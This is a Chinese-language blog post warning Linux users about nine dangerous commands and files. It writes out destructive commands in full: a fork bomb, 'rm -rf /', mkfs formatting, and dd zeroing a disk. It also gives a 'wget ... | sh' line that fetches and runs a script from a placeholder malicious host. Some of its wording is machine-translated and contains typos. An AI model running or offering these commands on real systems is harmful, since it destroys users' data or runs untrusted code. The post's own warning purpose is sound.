网站建设时要小心的9个Linux命令和代码

网站建设

Linux shell / terminal命令非常强大,只需一个简单的命令就可以删除文件夹,文件或根文件夹等。

在某些情况下,Linux甚至不会要求您进行确认,而是会立即执行命令,导致您丢失存储在这些文件和文件夹中的有价值数据和信息

人们通常在网上发布内容,推荐新的Linux用户来执行这些命令。对于发布内容的人来说,这似乎是一个笑话,但对于另一端的人来说,这不是笑话。

我们收集了一些对您的系统非常有害的Linux命令,以帮助您避免它们。请记住,它们确实很危险,甚至可以通过各种方式进行更改,以产生新的命令来造成更多伤害。

需要注意的一点是,如果在Ubuntu上以sudo为前缀其中一些命令只会很危险。在Linux的其他发行版中,大多数这些给定的命令以root身份执行会很危险。

看看你应该避免执行9个命令和代码。

1. Linux Fork Bomb命令

:(){ :|: & };:也称为Fork Bomb是针对Linux系统的拒绝服务攻击。:(){ :|: & };:是一个bash函数。一旦执行,它会重复多次,直到系统冻结

您只能通过重新启动系统来摆脱它。因此在Linux shell上执行此命令时要小心。

2. mv文件夹/ dev / null命令

mv folder/dev/null是另一个危险的命令。Dev/null或者null device一个设备文件,它丢弃写在其上的所有数据,但它报告写操作已成功执行。它也被称为钻头黑洞

3. rm -rf命令

rm -rf命令是在Linux操作系统中删除文件夹及其内容的快捷方法。如果您不知道如何正确使用它,那么它可能会对系统造成非常危险。下面列出了与rm-rf命令一起使用的最常见组合和选项:

  • rm 命令用于删除Linux系统中的文件。
  • rm -f 命令删除文件夹中的只读文件而不提示。
  • rm -r 命令以递归方式删除文件夹的内容。
  • rm -d command用于删除空目录,但如果目录不为空,则拒绝删除目录。
  • rm -rf/ 命令用于强制删除(即使它被写保护,也删除它)根目录和子文件夹中的所有内容。
  • rm -rf* 命令用于强制删除当前目录(当前正在使用的目录)和子文件夹中的所有内容。
  • rm -rf.命令用于强制删除当前文件夹和子文件夹中的所有内容。该rm -r.[^.]*命令也可以使用。
  • rm -i 命令用于删除文件和文件夹,但在删除之前会出现提示。

4. mkfs命令

mkfs如果您不了解其用途,则可能是基于Linux的系统的危险命令。mkfs之后写的任何内容都将被格式化并替换为空白的Linux文件系统

下面提到的所有命令都将格式化硬盘驱动器,它需要管理员权限:

  • mkfs
  • mkfs.ext3
  • mkfs.bfs
  • mkfs.ext2
  • mkfs.minix
  • mkfs.msdos
  • mkfs.reiserfs
  • mkfs.vfat

该命令mkfs.cramfs将执行与上述相同的操作,但不需要管理员权限来执行。

5.焦油炸弹

tar命令用于将多个文件组合成.tar格式的单个文件(存档文件)。可以使用此命令创建磁带归档(Tar)炸弹。

它是一个存档文件,它会将数千或数百万个文件分解为当前目录中的现有文件,而不是解压缩后的新目录。

通过在收到tar文件时定期创建一个新的保护目录,然后在解开之前将收到的tar文件移动到此目录中,您可以避免成为tar炸弹的受害者。

如果tar文件确实是一个tar炸弹,那么你可以简单地删除新创建的目录来摆脱它。另一种避免tar炸弹爆炸的方法是通过列出tar文件的所有内容-t选项来让你了解tar文件中包含的内容类型。

6. dd命令

dd命令用于复制和转换硬盘分区。但是,如果指定错误的目的地,则可能会有害。

该命令可以是以下任何一个:

  • dd if=/dev/hda of=/dev/hdb
  • dd if=/dev/hda of=/dev/sdb
  • dd if=something of=/dev/hda
  • dd if=something of=/dev/sda

以下命令将整个主硬盘驱动器清零: dd if=/dev/zero of=/dev/had

7. Shell脚本代码

有人可能通过向您提供shell脚本的链接并支持您下载并执行它使您受害。该脚本可能包含一些恶意或危险的代码。该命令的格式可能是这样的:wget http://some_malicious_source -O- | sh。在wget而SH下载脚本执行下载脚本。

8.恶意源代码

有人给你源代码并要求你编译它。代码可能看起来是普通代码,但实际上某些恶意代码在大型源代码中伪装,可能会对您的系统造成损害。为避免受到此类攻击的影响,只接受并编译来自可靠来源的源代码

9.减压炸弹

您收到了一个压缩文件,并要求您提取此文件,该文件看起来非常小,但可能只有几KB。实际上,这个小型压缩文件包含非常高度压缩的数据

解压缩文件后,将提取数百GB的数据,这些数据可能会占用硬盘驱动器以降低系统性能。为避免这种情况,请始终记住接受来自可靠来源的数据。

原创文章,作者:ItWorker,如若转载,请注明出处:https://blog.ytso.com/261399.html

(0)
上一篇 2022年5月24日
下一篇 2022年5月24日

相关推荐

发表回复

登录后才能评论